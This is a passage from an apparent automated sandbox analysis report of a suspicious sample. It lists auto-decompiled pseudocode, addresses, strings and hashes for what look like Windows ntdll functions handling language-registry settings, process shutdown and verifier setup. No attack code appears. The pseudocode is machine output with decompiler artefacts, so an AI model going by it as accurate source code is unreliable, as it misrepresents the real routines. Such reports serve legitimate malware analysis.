									E328D5050(0x2000000,  &_v84, _t134);
									_push(0x2000000);
									_t187 =  &_v92;
									_t184 = E3288D64A(_v120,  &_v92,  &_v104, _t194,  &_v100);
									_t194 = 0xc0000034;
									if(_t184 == 0xc0000034) {
										L42:
										_t176 = 0;
										 *_t170 = 1;
										_t194 = 0;
										goto L25;
									}
									_t140 = _v96;
									if(_v96 == 0) {
										goto L42;
									}
									if(_t184 != 0x80000005) {
										goto L43;
									}
									_t192 = L328A5D90(_t184,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t140 + 2);
									_v104 = _t192;
									if(_t192 == 0) {
										_t194 = 0xc0000017;
										goto L43;
									}
									_push(_t184);
									_t187 =  &_v88;
									_t194 = E3288D64A(_v116,  &_v88,  &_v100, _t192,  &_v96);
									if(_t194 < 0) {
										L22:
										_t190 = _v124;
										L23:
										if(_t194 != 0) {
											goto L32;
										}
										goto L24;
									}
									if(_v104 != 7) {
										if(_v104 == 1) {
											goto L21;
										}
										_t190 = _v124;
										_t176 = 0;
										_t194 = 0;
										 *_t170 = 1;
										goto L25;
									}
									L21:
									_t187 = _t192;
									_t194 = L328B4CA6(_v108, _t192, _v100 >> 1, "true", (0 | _a4 != 0x00000001) + 2, 1,  &_v124);
									goto L22;
								}
								_t155 = E3288D8D0(0x2000000, _v108, _v100,  &_v116);
								_t190 = _v128;
								_t194 = _t155;
								if(_t194 == 0) {
									if(_t190 != 0) {
										goto L31;
									}
								}
								E328D5050(0x2000000,  &_v84, L"Control Panel\\Desktop");
								_v56 = _v116;
								 *((intOrPtr*)(_t200 + 0x58)) =  &_v92;
								 *((intOrPtr*)(_t200 + 0x60)) = 0;
								_v40 = 0;
								_push( &_v60);
								_push(0x20019);
								_v60 = 0x18;
								_push( &_v120);
								 *((intOrPtr*)(_t200 + 0x68)) = 0x40;
								_t194 = E328D2AB0();
								if(_t194 < 0) {
									goto L51;
								}
								_t134 = L"PreferredUILanguages";
								if(_a8 != 3) {
									_t134 = L"PreferredUILanguagesPending";
								}
								_t194 = 0;
								goto L15;
							}
						}
					} else {
						_t194 = 0xc000000d;
						L39:
						return _t194;
					}
				}
			}

0x3288d2f4
0x3288d2f8
0x3288d2ff
0x3288d303
0x3288d307
0x3288d30b
0x3288d30f
0x3288d317
0x3288d31b
0x3288d31f
0x3288d325
0x3288d327
0x3288d32d
0x328ea69c
0x00000000
0x3288d344
0x3288d344
0x3288d347
0x3288d34c
0x3288d360
0x3288d369
0x3288d371
0x3288d37b
0x3288d37f
0x3288d380
0x3288d389
0x3288d391
0x3288d392
0x3288d396
0x3288d3a1
0x328ea60d
0x328ea612
0x328ea616
0x328ea61a
0x328ea624
0x328ea628
0x00000000
0x00000000
0x00000000
0x00000000
0x3288d3a7
0x3288d3a7
0x3288d3a9
0x3288d3ad
0x3288d3b0
0x328ea630
0x328ea63b
0x328ea64c
0x328ea650
0x328ea650
0x328ea63b
0x3288d3c9
0x3288d3cd
0x328ea658
0x328ea658
0x00000000
0x3288d3d3
0x3288d3d7
0x3288d5d5
0x3288d5de
0x3288d5e0
0x3288d5e8
0x3288d5f0
0x3288d5f1
0x3288d5fa
0x3288d602
0x3288d603
0x3288d60e
0x3288d615
0x3288d623
0x3288d642
0x3288d52e
0x3288d52e
0x3288d530
0x3288d530
0x3288d535
0x3288d549
0x3288d54d
0x3288d54f
0x3288d560
0x3288d564
0x328ea6cd
0x328ea6cd
0x3288d564
0x00000000
0x328ea6a6
0x328ea6ac
0x328ea6b2
0x328ea6b7
0x328ea6bb
0x328ea6bf
0x3288d56a
0x3288d56d
0x3288d56f
0x3288d56f
0x3288d575
0x3288d63b
0x3288d63b
0x00000000
0x3288d57b
0x3288d582
0x3288d588
0x3288d58d
0x3288d592
0x3288d594
0x3288d598
0x3288d59d
0x3288d59d
0x3288d5a6
0x3288d5a8
0x3288d5ac
0x3288d5b1
0x3288d5b1
0x3288d5ba
0x328ea6d7
0x328ea6db
0x328ea6db
0x00000000
0x3288d5ba
0x3288d575
0x328ea6c5
0x00000000
0x328ea6c5
0x3288d535
0x3288d625
0x3288d465
0x3288d46b
0x3288d470
0x3288d480
0x3288d489
0x3288d48b
0x3288d492
0x3288d62f
0x3288d62f
0x3288d631
0x3288d634
0x00000000
0x3288d634
0x3288d498
0x3288d49e
0x00000000
0x00000000
0x3288d4aa
0x00000000
0x00000000
0x3288d4c4
0x3288d4c6
0x3288d4cc
0x328ea677
0x00000000
0x328ea677
0x3288d4d2
0x3288d4e2
0x3288d4eb
0x3288d4ef
0x3288d526
0x3288d526
0x3288d52a
0x3288d52c
0x00000000
0x00000000
0x00000000
0x3288d52c
0x3288d4f6
0x328ea686
0x00000000
0x00000000
0x328ea68c
0x328ea690
0x328ea692
0x328ea694
0x00000000
0x328ea694
0x3288d4fc
0x3288d507
0x3288d524
0x00000000
0x3288d524
0x3288d3ea
0x3288d3ef
0x3288d3f3
0x3288d3f7
0x328ea662
0x00000000
0x00000000
0x328ea668
0x3288d407
0x3288d410
0x3288d418
0x3288d41e
0x3288d422
0x3288d42a
0x3288d42b
0x3288d434
0x3288d43c
0x3288d43d
0x3288d44a
0x3288d44e
0x00000000
0x00000000
0x3288d458
0x3288d45d
0x328ea66d
0x328ea66d
0x3288d463
0x00000000
0x3288d463
0x3288d3cd
0x328ea5f6
0x328ea5f6
0x3288d5c0
0x3288d5c8
0x3288d5c8
0x3288d34c

Strings

Control Panel\Desktop, xrefs: 3288D3FD
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3288D356
PreferredUILanguagesPending, xrefs: 328EA66D
@, xrefs: 3288D389
@, xrefs: 3288D603
MachinePreferredUILanguages, xrefs: 3288D625
Control Panel\Desktop\MuiCached, xrefs: 3288D5CB
PreferredUILanguages, xrefs: 3288D458, 3288D465
@, xrefs: 3288D43D

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: d79218bcc370bcf3e8506151bc684b4de09db867889811db6fc70f0eee65d335
Instruction ID: f3c7e72e01343df921efa57f2e2c1b9c7a27f4d90ca0422dfa4c77fb5f3c3169
Opcode Fuzzy Hash: d79218bcc370bcf3e8506151bc684b4de09db867889811db6fc70f0eee65d335
Instruction Fuzzy Hash: 9FB1AABA9083459FD715CF28C480B9FB7E8AF89758F41492EF899D7211DB70D908CB92

Uniqueness

Uniqueness Score: -1.00%

Function 328BD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E328BD6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push("true");
				_push(0x3296c5e8);
				_t68 = E328E7BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x32985da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x329837c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E3290E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x32985dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x32985da8 = 1;
				if( *0x329865f0 != 0) {
					_t137 =  *0x329891f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x329891e0("true");
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E32894779(_t74, _t118);
				}
				if(( *0x3298391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x32989234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x32989234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x329868c8;
					if( *0x329868c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E32910FC8();
							 *0x329868c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E328BD8F0();
					}
					_t68 = E328BD898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x32985da0; // 0x257c450
				L8:
				if(_t129 != 0x32985d9c) {
					_t18 = _t129 - 0x10; // 0x257c440
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x257cc90
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x76775cd0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						L328ADC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E328AF0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						L328ADCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E328BD886();
					}
					goto L8;
				}
				_t119 =  *0x32985b24; // 0x2552ce0
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					L328ADC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x32985b24; // 0x2552ce0
					E328AF0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E328BD88F();
				}
				goto L15;
			}

0x328bd6d0
0x328bd6d2
0x328bd6d7
0x328bd6dc
0x328bd6e3
0x328bd6ed
0x328bd810
0x328bd813
0x328bd81f
0x328bd81f
0x328bd6f3
0x328bd6f9
0x328bd6fc
0x328bd6ff
0x328bd702
0x328bd709
0x328ff0c2
0x328ff0c2
0x328bd716
0x328ff0cd
0x328ff0e7
0x328ff0ec
0x328ff0ec
0x328bd71c
0x328bd71f
0x328bd724
0x328bd732
0x328bd86d
0x328bd873
0x328bd875
0x328bd877
0x328bd879
0x328bd87f
0x328bd87f
0x328bd738
0x328bd740
0x328bd742
0x328bd744
0x328bd744
0x328bd750
0x328ff0f4
0x328ff0f7
0x328ff0fe
0x328ff101
0x328ff108
0x328ff10b
0x328ff10d
0x00000000
0x00000000
0x328ff113
0x328ff117
0x328bd7ed
0x328bd7ed
0x328bd7f3
0x328bd7fa
0x328ff13c
0x328ff13f
0x328ff145
0x328ff14a
0x328ff14a
0x328ff13f
0x328bd800
0x328bd804
0x328bd806
0x328bd806
0x328bd80b
0x00000000
0x328bd80b
0x328bd756
0x328bd756
0x328bd75a
0x328bd75d
0x328bd766
0x328bd76c
0x328bd76e
0x328bd76e
0x328bd771
0x328bd774
0x328bd774
0x328bd777
0x328bd77a
0x328bd77a
0x328bd77d
0x328bd782
0x328bd78d
0x328bd794
0x328bd799
0x328bd79f
0x328bd79f
0x328bd7a1
0x328bd7a7
0x328bd7ac
0x328bd7af
0x328bd7b2
0x328bd7b6
0x328bd7da
0x328bd7da
0x328bd7b8
0x328bd7b9
0x328bd7c0
0x328bd7c5
0x328bd7cc
0x328bd7cf
0x328bd7cf
0x00000000
0x328bd782
0x328bd7e1
0x328bd7e7
0x328bd7eb
0x328bd820
0x328bd827
0x328bd82c
0x328bd832
0x328bd834
0x328bd83a
0x328bd83f
0x328bd842
0x328bd84a
0x328bd84f
0x328bd856
0x328bd856
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 328BD879

Part of subcall function 32894779: RtlDebugPrintTimes.NTDLL ref: 32894817

Strings

$, xrefs: 328BD820
$, xrefs: 328BD78D
Process 0x%p (%wZ) exiting, xrefs: 328FF0D1
LdrShutdownProcess, xrefs: 328FF0D8
minkernel\ntdll\ldrinit.c, xrefs: 328FF0E2

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: be0a42dd0834576f5c6e90486e831767c3f90859b78cbfc58b8637a1cb89d312
Instruction ID: 4142adcfc6fdcc3d4ce3ceb07658f42d5f560542c3ba7934308bec5e5ce27ab4
Opcode Fuzzy Hash: be0a42dd0834576f5c6e90486e831767c3f90859b78cbfc58b8637a1cb89d312
Instruction Fuzzy Hash: 2D51E27DA08349AFEF04CFA8C88479DBBB1BF44318F54445DD818AB781DB75A986CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3288D02D Relevance: 10.2, Strings: 8, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E3288D02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E328D5050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_push("true");
					_pop(_t184);
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(E328D2AB0() >= 0) {
						_t182 = L3294ADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E328D2A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								E328D2A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								E328D2A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = E3288DAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(L3294AD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_push("true");
								_pop(_t160);
							}
						}
						_push(_v160);
						E328D2A80();
						_v164 = _v164 & 0x00000000;
						_push("true");
						_pop(_t184);
					}
					_t170 = 0x2000000;
					if(E3288D736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E328D5050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = E328D2AB0();
						}
						if(_t128 < 0) {
							E328D5050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = E328D2AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E328D5050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_push("true");
						_pop(_t164);
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(E328D2AB0() >= 0) {
							_t170 = _v144;
							_t182 = L3294ADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_push("true");
							_pop(_t184);
						}
						E328D5050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = E328D2AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = E3288D9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}

0x3288d035
0x3288d03f
0x3288d042
0x3288d044
0x3288d048
0x3288d04c
0x3288d050
0x3288d056
0x328ea5a1
0x00000000
0x3288d065
0x3288d067
0x3288d075
0x3288d07a
0x3288d07c
0x3288d081
0x3288d085
0x3288d08f
0x3288d093
0x3288d094
0x3288d09d
0x3288d0a5
0x3288d0a6
0x3288d0aa
0x3288d0b5
0x328ea52a
0x328ea52e
0x3288d194
0x3288d199
0x3288d19b
0x3288d19f
0x3288d19f
0x3288d1a9
0x328ea5ab
0x328ea5af
0x328ea5af
0x3288d1b4
0x3288d1b6
0x3288d1ba
0x3288d1ba
0x3288d1c1
0x328ea5bb
0x00000000
0x00000000
0x328ea5c1
0x328ea5c7
0x00000000
0x00000000
0x328ea5d0
0x328ea5df
0x328ea5df
0x00000000
0x3288d1c7
0x3288d1ca
0x3288d1de
0x3288d1e6
0x3288d1e6
0x3288d1cf
0x3288d1d4
0x3288d1d8
0x328ea5e6
0x328ea5ea
0x328ea5ef
0x328ea5ef
0x328ea5ef
0x00000000
0x3288d1d8
0x3288d1c1
0x328ea537
0x328ea541
0x328ea54d
0x328ea556
0x328ea558
0x328ea558
0x328ea54d
0x328ea559
0x328ea55d
0x328ea562
0x328ea567
0x328ea569
0x328ea569
0x3288d0bf
0x3288d0cc
0x328ea56f
0x328ea56f
0x3288d0d5
0x3288d1ec
0x00000000
0x00000000
0x3288d1fc
0x3288d2de
0x3288d202
0x3288d20c
0x3288d215
0x3288d21a
0x3288d222
0x3288d22a
0x3288d232
0x3288d23d
0x3288d23e
0x3288d247
0x3288d24e
0x3288d24f
0x3288d25a
0x3288d25a
0x3288d261
0x3288d26d
0x3288d272
0x3288d27b
0x3288d283
0x3288d28b
0x3288d293
0x3288d2a1
0x3288d2a2
0x3288d2ab
0x3288d2b2
0x3288d2b3
0x3288d2c3
0x3288d2c7
0x00000000
0x3288d2e5
0x3288d2c7
0x00000000
0x3288d0db
0x3288d0e0
0x3288d192
0x3288d192
0x00000000
0x3288d192
0x3288d0f0
0x3288d0f9
0x3288d0fe
0x3288d103
0x3288d10b
0x3288d10d
0x3288d10e
0x3288d116
0x3288d117
0x3288d120
0x3288d124
0x3288d125
0x3288d130
0x328ea580
0x328ea58f
0x328ea593
0x00000000
0x00000000
0x328ea599
0x328ea59b
0x328ea59b
0x3288d140
0x3288d149
0x3288d14e
0x3288d153
0x3288d158
0x3288d160
0x3288d168
0x3288d169
0x3288d172
0x3288d176
0x3288d177
0x3288d180
0x3288d184
0x3288d2c9
0x3288d2d7
0x00000000
0x3288d18a
0x3288d18a
0x3288d190
0x3288d190
0x00000000
0x00000000
0x00000000
0x3288d190
0x3288d184
0x3288d0d5

Strings

Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3288D0E6
@, xrefs: 3288D2B3
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3288D06F
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3288D263
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3288D202
Control Panel\Desktop\LanguageConfiguration, xrefs: 3288D136
@, xrefs: 3288D24F
@, xrefs: 3288D09D

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 03fe5927d31395c7b3ddc2210f3d13150ec719416ad38b8790d899958296f330
Instruction ID: ed8ba30da8f086054097fea6eac59564b3bd2e15eba50f14b5f5a6461092d75c
Opcode Fuzzy Hash: 03fe5927d31395c7b3ddc2210f3d13150ec719416ad38b8790d899958296f330
Instruction Fuzzy Hash: 68A12BBA5083459FE321CF64C480B9BF7E8AF88759F40492EF99996241DB74D908CB93

Uniqueness

Uniqueness Score: -1.00%

Function 32918633 Relevance: 9.0, Strings: 7, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E32918633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E329136EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x32985a74 = _t52;
							 *0x32985000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x32985238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										L32886CC0(_t127, L"HandleTraces", "true", 0x329869d8, "true", 0);
									}
									L32886CC0(_t127, L"VerifierDebug", "true", 0x329869dc, "true", 0);
									L32886CC0(_t127, L"VerifierDlls", 1, 0x32985000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = L329198B2(0x32861b98, _v8, __eflags, _t127, _a12, 0x32985260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x32985260;
									_t128 = E32918FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										L328C1D66(0x32861b98, _t116, 0);
										 *0x32989234 = _v32;
										L328C1D66(0x32861b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							L32886CC0(_t127, L"VerifierFlags", "true",  &_v24, "true", 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x32985a74; // 0x0
								goto L40;
							}
							 *0x32985a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x32985244 = 0x32985240;
				 *0x32985240 = 0x32985240;
				_t128 = E328BFBC0(0x32985220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x32989234 == 2) {
					_v29 = 0;
					_t128 = E328B1934(0x32985308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x32985a74);
